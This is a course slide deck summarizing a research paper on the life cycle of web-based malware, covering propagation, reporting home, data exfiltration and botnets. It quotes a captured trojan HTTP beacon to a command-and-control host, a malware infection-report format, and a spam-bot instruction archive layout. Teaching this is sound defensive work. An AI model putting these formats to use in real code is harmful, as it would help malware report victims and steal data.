250 likes | 390 Views
CS 510 mALWARE ghost turns zombie : exploring the life cycle of web-based malware Michalis polychronakis panayiotis mavrommatis niels provos. Introduction. The underground Internet economy Web-based malware The system analyzing the post-infection network behavior of web-based malware
E N D
CS 510 mALWAREghost turns zombie: exploring the life cycle of web-based malwareMichalispolychronakispanayiotismavrommatisnielsprovos
Introduction • The underground Internet economy • Web-based malware • The system analyzing the post-infection network behavior of web-based malware • How do malware’s behaviors taken together provide a compelling perspective on the life cycle of web-based malware?
System Architecture • The goal of the system • detect harmful URLs on the web • The brief overview of the overall system they used in their prior work • machine learning techniques are used to find suspicious URLs among a large number of web pages for verification in a virtual machine • The new extended system • Responders
System Architecture Over system architecture • Virtual machine used • Observed features: • Links to known malware distribution sites • Suspicious HTML element • The presence of code obfuscation. • Machine learning system • Scores if the URL has a high score • Verification results used to retrain the machine learning system
System Architecture • Responders • They extended the system improving verification components with light-weight responders • Providing fabricated responses for protocols such as SMTP, FTP and IRC • HTTP proxy is to record all HTTP requests and scan all HTTP responses • Generic responder is to hand off connections over nonstandard ports and identify connections that use unknown protocols
Responders • Network flow in the verification component
Life cycle of web-based malware • Malware’s interaction with other hosts and responders are organized into 3 categories: 1.Propagation 2.Data exfiltration 3.Remote control • They analyzed the post-infection activity and the result of these behaviors to find out the life cycle of web-based malware
Life cycle of web-based malware Data Set • In 2 months virtual machine analyzed URLs from 5,756,000 unique host names and report on unique names • At least one harmful URL in 307,000 hostnames • %49 of these websites had URLs that resulted in HTTP request initiated from process other than the web browser • %5 of the sites had URLs that activated responder session • The total number of responder sessions with transmitted data is more than 448,000 • They observed that malware made network connections without transmitting data in many more cases
Life cycle of web-based malware Network characteristics • The destination ports of all outgoing connections from the virtual machine upon infection
Life cycle of web-based malware Network characteristics • They notified the number of unique hostnames for each port On these hosts at least one URL installs malware that transmitted data to that port • More than 400 different destination ports were connected This shows the diverse nature of malware’s post- infection network behavior
The exact distribution of HTTP connections destined to nonstandard ports according to the destination port number
Life cycle of web-based malware Discovery and Propagation • Malwares usually scan for other vulnerable systems either in the same lan or on the internet to propagate • This figure shows the network protocol distribution used by malware
Life cycle of web-based malware Reporting Home • To observe this activity SMTP responders are employed to capture emails • Each email captured hasa subject and body
Life cycle of web-based malware Reporting Home • Table 1 shows that the most common email subjects • Table 2 above shows that the commonSMTP • servers used by malware to send installation • reports
Life cycle of web-based malware Reporting Home • The HHTP protocol is also used to report successful installations back to malware authors • The trojan example: GET /geturl.php?version=1.1.2&fid=7493&mac=00-00-00-00-00- 00&lversion=&wversion=&day=0&name=dodolook&recent=0 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; ) Host: loader.51edm.net:1207 Cache-Control: no-cache
Life cycle of web-based malware Reporting Home • Malware also reported infections using a custom XML-like format • HGZ5.<FT>2008-01-28 12:55:30</FT><IM>80</IM><GR>_&</GR> • <SYS>Windows XP 5.1</SYS> • <NE>XP</NE><pid>488</PID><VER>Ver1.22-0624</VER> • <BZ></BZ><P>1</P><V>0</V><IP>0.0.0.0</IP> • 000......<LC></LC><GR>-</GR><IM>25</IM><NA>XP</NA> • <CS>English (United States)</CS><OS>Windows XP</OS> • <MEM>1024MB</MEM><CPU>2200 MHz</CPU> • <NET>LAN</NET><video>0</video><BZ>-</BZ>
Life cycle of web-based malware Data exfiltration • There are indications of data exfiltration in responder sessions such as browser history files and stored passwords • In their observation, they found some emails that send back stored password from a compromised machine • HTTP is also used for sending sensitive information back to data collection servers (notice the large number of POST requests on the graph on slide #11)
Life cycle of web-based malware Data exfiltration • In 2 days, one server had 4,729 files including more than 250,000 valid email addresses • They found more sensitive information in extensive logs continuously uploaded by malware Logs have victim’s IP address, DNS server, gateway, MAC address, username, URL, intercepted form and password fields of HTTP request • In 250MB logs, 500 usernames and passwords were found for over 250 web sites such as banking site, google.com, yahoo.com, etc.
Life cycle of web-based malware Joining Botnets • Botnets • They encountered 2 types of botnets in their work: 1.IRC Botnets 2.HTTP Botnets
Life cycle of web-based malware IRC Botnets • IRC and C&C communication • IRC sessions to 90 servers were observed using 1587 different nicknames in 95 channels
Life cycle of web-based malware IRC Botnets • Some malwares use regular nicknames and channels, but some of them use artificial nicknames such as [0]USA|XP[P]152102 or Inject-2l087876
Life cycle of web-based malware HTTP Botnets • Organize large-scale spam campaigns • To participate in spam campaigns each bot repeatedly downloaded ZIP-archives with instructions using HTTP requests • Each response has a ZIP-archive with instructions on how to participate in spam campaigns
Life cycle of web-based malware HTTP Botnets • Some example instructions: • 000_data22 - a list of domains and their authoritative name severs used to form the sender's email address • 001_ncommall - a list of common first names used as part of the sender's email address • 002_otkogo_r - a list of possible ``from'' names related to the subject of the spam campaign • 003_subj_rep - a list of possible email subjects, • 004_outlook - the template of the spam email, • config - a configuration file that instructs the bot how to construct emails from the data files, how many emails to sent in total, and how many connections are allowed at a given time, • message - the message body of the spam campaign, • mlist - a list of email addresses to which to send the spam, • andmxdata - a binary file containing information about the mail-exchange servers for the email addresses in mlist
Life cycle of web-based malware HTTP Botnets • The most frequent domains captured in an hour didn’t entirely overlap with the larger data set